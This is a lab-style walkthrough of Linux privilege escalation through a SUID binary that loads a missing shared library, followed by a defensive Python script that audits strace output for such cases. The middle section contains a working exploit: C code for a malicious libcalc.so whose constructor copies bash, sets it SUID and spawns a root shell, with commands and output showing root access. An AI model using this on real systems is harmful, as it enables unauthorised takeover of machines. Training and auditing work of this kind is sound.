SUID

No Such File

When looking for files with SUID permissions, I found an interesting file.

TCM@debian:~$ find / -type f -perm -04000 -ls 2>/dev/null
816078   12 -rwsr-sr-x   1 root     staff        9861 May 14  2017 /usr/local/bin/suid-so

Executing the file.

TCM@debian:~$ /usr/local/bin/suid-so
Calculating something, please wait...
[=====================================================================>] 99 %
Done.

Now we'll use strace to see what's going on behind the scenes.

TCM@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY)       = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY)        = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY)    = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
-----> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory) <-----

There are a few "No such file" errors. We can create a malicious file with the name of a missing file and place it anywhere we have write access. We have write access to the last folder, so we'll create a file named libcalc.so.

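#include <stdio.h>
#include <stdlib.h>

/* The constructor attribute makes the loader call inject() as soon as
   the library is loaded, before the SUID program's own code continues. */
static void inject() __attribute__((constructor));

void inject() {
        /* Runs with the effective UID of the SUID binary (root). */
        system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}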

Compile the file and place it at that location.

TCM@debian:~$ mkdir /home/user/.config
TCM@debian:~$ gcc -shared -fPIC /home/user/libcalc.c -o /home/user/.config/libcalc.so

Now execute the binary.

TCM@debian:~$ /usr/local/bin/suid-so
Calculating something, please wait...
bash-4.1# whoami
root
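
The strace output above can also be read from the defender's side when auditing SUID binaries. The following Python script is an added example, not part of the original walkthrough: it flags every shared object a traced binary opens outside the system library directories and reports whether a non-root user controls the directory where that file would live. The trusted directory list and the function names are assumptions.

```python
import os
import posixpath
import re

# Assumption: directories the loader is expected to use; adjust per distribution.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib")

# open()/openat() as strace prints them: path, return value, optional errno name.
OPEN_RE = re.compile(
    r'\bopen(?:at)?\((?:AT_FDCWD,\s*)?"(?P<path>[^"]+)"[^)]*\)\s*=\s*(?P<ret>-?\d+)(?:\s+(?P<err>E[A-Z]+))?')
SO_RE = re.compile(r"\.so(?:\.\d+)*$")

# Lines copied from the strace output above.
SAMPLE = '''\
open("/etc/ld.so.cache", O_RDONLY)      = 3
open("/lib/libdl.so.2", O_RDONLY)       = 3
open("/lib/libc.so.6", O_RDONLY)        = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
'''.splitlines()

def is_trusted(path):
    """True if the normalised path sits under a trusted library directory."""
    norm = posixpath.normpath(path)
    return any(norm.startswith(d + "/") for d in TRUSTED_LIB_DIRS)

def audit_strace(lines):
    """Return (path, status) for every shared object opened outside TRUSTED_LIB_DIRS."""
    findings = []
    for line in lines:
        m = OPEN_RE.search(line)
        if not m or not SO_RE.search(m["path"]) or is_trusted(m["path"]):
            continue
        status = "loaded" if int(m["ret"]) >= 0 else (m["err"] or "error")
        findings.append((m["path"], status))
    return findings

def non_root_controlled(path):
    """Check the nearest existing ancestor: whoever can write there can create the path."""
    d = posixpath.dirname(posixpath.abspath(path))
    while not os.path.isdir(d):
        d = posixpath.dirname(d)
    st = os.stat(d)
    return st.st_uid != 0 or bool(st.st_mode & 0o022)

if __name__ == "__main__":
    for path, status in audit_strace(SAMPLE):
        print(f"{status:8} {path}  non-root-controlled={non_root_controlled(path)}")
```

A finding with status ENOENT in a non-root-controlled directory is the condition shown on this page; a "loaded" finding outside the trusted directories deserves the same review, since the file could be replaced.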
